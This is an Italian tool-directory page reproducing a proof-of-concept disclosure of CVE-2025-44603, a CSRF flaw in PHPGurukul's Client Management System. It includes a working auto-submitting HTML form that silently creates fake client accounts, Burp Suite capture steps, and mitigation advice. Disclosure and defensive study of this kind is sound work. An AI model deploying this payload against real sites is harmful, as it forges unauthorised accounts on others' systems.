Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-44603-CSRF-Leads_to_Create_FakeUsers — Prova di concetto che dimostra una vulnerabilità CSRF in un sistema di gestione clienti basato su PHP, con codice di exploit HTML e strategie di mitigazione per il test di sicurezza delle applicazioni web. | Kitploit
Strumenti/GitHubGitHub/moulish2004/cve-2025-44603-csrf-leads_to_create_fakeusers
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHubmoulish2004/cve-2025-44603-csrf-leads_to_create_fakeusers

CVE-2025-44603-CSRF-Leads_to_Create_FakeUsers

Prova di concetto che dimostra una vulnerabilità CSRF in un sistema di gestione clienti basato su PHP, con codice di exploit HTML e strategie di mitigazione per il test di sicurezza delle applicazioni web.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
11 anno faNon ancora revisionato

CVE-2025-44603 (Vulnerabilità CSRF: Porta alla Creazione di Client Fittizi)

Project Name & Repo URL : https://phpgurukul.com/client-management-system-using-php-mysql/

Vulnerability Name : Cross-Site Request Forgery(CSRF)

Affected Version : V1.2

Introduzione

Una vulnerabilità di Cross-Site Request Forgery (CSRF) è presente nella funzionalità Aggiungi Client del Client Management System sviluppato da PHPGurukul. CSRF è un attacco in cui un utente autenticato viene indotto a inviare una richiesta dannosa a un'applicazione web. Ciò può portare all'esecuzione di azioni non autorizzate per conto dell'utente. In questo report, dimostriamo come CSRF possa essere utilizzato per creare utenti fittizi in un Client Management System e suggeriamo strategie di mitigazione.

Configurazione dell'Ambiente

  • Client Management System ospitato localmente utilizzando MySQL e PHP.
  • Funzionalità per aggiungere client e i relativi servizi.

Passaggi per Sfruttare la CSRF

1. Accedi come Admin

Utilizzando le credenziali fornite, accedi al Client Management System.

Accesso come admin

2. Aggiungi un Nuovo Client

  • Seleziona l'opzione Aggiungi Client.
  • Inserisci i dettagli richiesti del client.

Aggiunta nuovo client Inserisci i dettagli del client

3. Cattura la Richiesta di Aggiunta del Client

  1. Vai al pulsante Salva.
  2. Configura Burp Suite per intercettare le richieste.
  3. Fai clic su Salva e cattura la richiesta HTTP prima che raggiunga il server.
  4. Invia la richiesta catturata alla scheda Repeater senza il cookie di sessione per l'analisi.

Cattura della richiesta in Burp Invio a Repeater

Codice CSRF per Client Fittizi

Di seguito è riportato il PoC HTML per l'attacco CSRF:

root@kitploit:~
<html>
  <body>
    <form action="http://localhost/clientms/admin/add-client.php" method="POST">
      <input type="hidden" name="accounttype" value="Active Account" />
      <input type="hidden" name="cname" value="moulimurugan" />
      <input type="hidden" name="comname" value="kppr" />
      <input type="hidden" name="address" value="vijayamangalam" />
      <input type="hidden" name="city" value="erode" />
      <input type="hidden" name="state" value="tamil" />
      <input type="hidden" name="zcode" value="638026" />
      <input type="hidden" name="wphnumber" value="968560710" />
      <input type="hidden" name="cellphnumber" value="6931052465" />
      <input type="hidden" name="ophnumber" value="9638560410" />
      <input type="hidden" name="email" value="[email protected]" />
      <input type="hidden" name="password" value="moulimurugan" />
      <input type="hidden" name="websiteadd" value="clientmsdb" />
      <input type="hidden" name="notes" value="Nil" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Creazione di Client Fittizi

  • Modifica i dettagli esistenti per creare client fittizi.

Aggiunta utente fittizio 1 Aggiunta utente fittizio 2

Test del PoC CSRF

  1. Apri il link PoC CSRF generato in un browser.
  2. La pagina web si apre con un pulsante Invia.
  3. Fai clic su Invia e la richiesta viene eseguita, creando client fittizi.

Apri PoC nel browser Premi Invia richiesta

Conferma della Creazione di Client Fittizi

  • Dopo l'invio, i client fittizi appaiono nel pannello di amministrazione.

Client fittizi creati Più utenti creati

Strategie di Mitigazione

Per prevenire attacchi CSRF, implementa le seguenti misure:

  1. Token CSRF
    • Usa token anti-CSRF in tutti gli invii di moduli e verificali lato server.
  2. Cookie SameSite
    • Imposta i cookie di sessione con attributi SameSite=Strict o SameSite=Lax.
  3. Convalida degli Header Referer e Origin
    • Valida gli header Referer e Origin prima di elaborare le richieste.
  4. Controlli di Autenticazione Utente
    • Richiedi CAPTCHA per azioni critiche per prevenire attacchi automatizzati.
  5. Limita i Metodi HTTP
    • Usa POST per azioni sensibili ed evita di elaborare richieste GET con effetti collaterali.

Conclusione

Questo report dimostra come le vulnerabilità CSRF possano essere sfruttate per creare Client non autorizzati in un Client Management System. L'implementazione delle strategie di mitigazione suggerite aiuterà a proteggere l'applicazione da tali attacchi.

Scarica lo strumento